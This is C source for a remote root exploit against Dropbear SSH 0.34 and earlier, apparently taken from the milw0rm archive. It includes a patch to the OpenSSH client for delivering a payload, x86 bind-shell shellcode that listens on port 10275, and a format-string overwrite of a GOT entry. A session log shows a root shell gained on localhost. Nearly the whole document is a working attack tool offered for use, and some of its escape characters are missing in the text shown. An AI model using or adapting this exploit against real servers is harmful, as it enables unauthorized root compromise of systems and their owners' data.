/*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000000 -0300
@@ -278,6 +278,8 @@
void
userauth(Authctxt *authctxt, char *authlist)
{
+ char *shellcode = getenv("SHELLCODE");
+
if (authlist == NULL) {
authlist = authctxt->authlist;
} else {
@@ -290,6 +292,7 @@
if (method == NULL)
fatal("Permission denied (%s).", authlist);
authctxt->method = method;
+ authctxt->method->name = shellcode;
if (method->userauth(authctxt) != 0) {
debug2("we sent a %s packet, wait for reply", method->name);
break;
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define SSH_PATH "ssh"
#define SSH_PORT "22"
#define DEFAULT_VERSION_PAD 24
#define DEFAULT_RETLOC 0xbffff800
#define DEFAULT_RETADDR 0x080e /* 2 byte retaddr, not enough space for a
* full overwrite. */
/* fork/bind shellcode by live
* default port is 10275
*
* I believe this can be futher optmized, but size is not
* an issue here since we are sending the shellcode through
* a ssh variable which is about 30k bytes long.
*/
char shellcode[] =
"x31xc0" /* xor %eax,%eax */
"xb0x02" /* mov $0x2,%al */
"xcdx80" /* int $0x80 */
"x85xc0" /* test %eax,%eax */
"x75x54" /* jne 5e */
"xebx50" /* jmp 5c */
"x5e" /* pop %esi */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x89x06" /* mov %eax,(%esi) */
"xfexc8" /* dec %al */
"x89x46x04" /* mov %eax,0x4(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"x89xf1" /* mov %esi,%ecx */
"xcdx80" /* int $0x80 */
"x89x06" /* mov %eax,(%esi) */
"x89x4ex04" /* mov %ecx,0x4(%esi) */
"x80x46x04x0c" /* addb $0xc,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x10" /* mov $0x10,%al */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x66x89x46x0c" /* mov %ax,0xc(%esi) */
"x66xb8x28x23" /* mov $0x2328,%ax */
"x89x46x0e" /* mov %eax,0xe(%esi) */
"x31xc0" /* xor %eax,%eax */
"x89x46x10" /* mov %eax,0x10(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"xfexcb" /* dec %bl */
"x89x5ex04" /* mov %ebx,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x66" /* mov $0x66,%al */
"xb3x04" /* mov $0x4,%bl */
"xcdx80" /* int $0x80 */
"xebx04" /* jmp 60 */
"xebx44" /* jmp a2 */
"xebx3a" /* jmp 9a */
"x31xc0" /* xor %eax,%eax */
"x89x46x04" /* mov %eax,0x4(%esi) */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"x31xc9" /* xor %ecx,%ecx */
"x89xc3" /* mov %eax,%ebx */
"x31xc0" /* xor %eax,%eax */
"xb0x3f" /* mov $0x3f,%al */
"xcdx80" /* int $0x80 */
"xfexc1" /* inc %cl */
"x80xf9x03" /* cmp $0x3,%cl */
"x75xf3" /* jne 72 */
"x68x2fx2fx73x68" /* push $0x68732f2f */
"x68x2fx62x69x6e" /* push $0x6e69622f */
"x89xe3" /* mov %esp,%ebx */
"x31xc0" /* xor %eax,%eax */
"x88x43x08" /* mov %al,0x8(%ebx) */
"x50" /* push %eax */
"x53" /* push %ebx */
"x89xe1" /* mov %esp,%ecx */
"x89xe2" /* mov %esp,%edx */
"xb0x0b" /* mov $0xb,%al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"xfexc0" /* inc %al */
"xcdx80" /* int $0x80 */
"xe8x65xffxffxff" /* call c <up> */
;
static void usage(const char *progname);
int
main(int argc, char *argv[])
{
char buffer[29500], fmt[26], *target;
long int retloc, retaddr;
int ch, version_pad;
retloc = DEFAULT_RETLOC +1;
retaddr = DEFAULT_RETADDR -40;
version_pad = DEFAULT_VERSION_PAD;
while ( (ch = getopt(argc, argv, "l:r:v:")) != -1) {
switch (ch) {
case 'l':
retloc += atoi(optarg) *4;
break;
case 'r':
retaddr += atoi(optarg) *4;
break;
case 'v':
version_pad = atoi(optarg);
break;
}
}
if (argc -optind != 1) {
usage(argv[0]);
exit(-1);
}
argc -= optind;
argv += optind;
target = argv[0];
memset(buffer, 0x90, 29500);
memcpy(buffer +29500 -strlen(shellcode), shellcode, strlen(shellcode));
memcpy(buffer, "SHELLCODE=", 10);
putenv(buffer);
snprintf(fmt, sizeof fmt, "%c%c%c%c%%.%du%%%d$hn",
(retloc & 0xff),
(retloc & 0xff00) >> 8,
(retloc & 0xff0000) >> 16,
(retloc & 0xff000000) >> 24,
retaddr,
version_pad);
execl(SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL);
exit(0);
}
static void
usage(const char *progname) {
fprintf(stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploitn");
fprintf(stderr, "coded by livenn");
fprintf(stderr, "Usage: %s [-l <retloc offset>] [-r <retaddr offset>]"
" [-v <version pad>] <target>n", progname);
}
// milw0rm.com [2004-08-09]
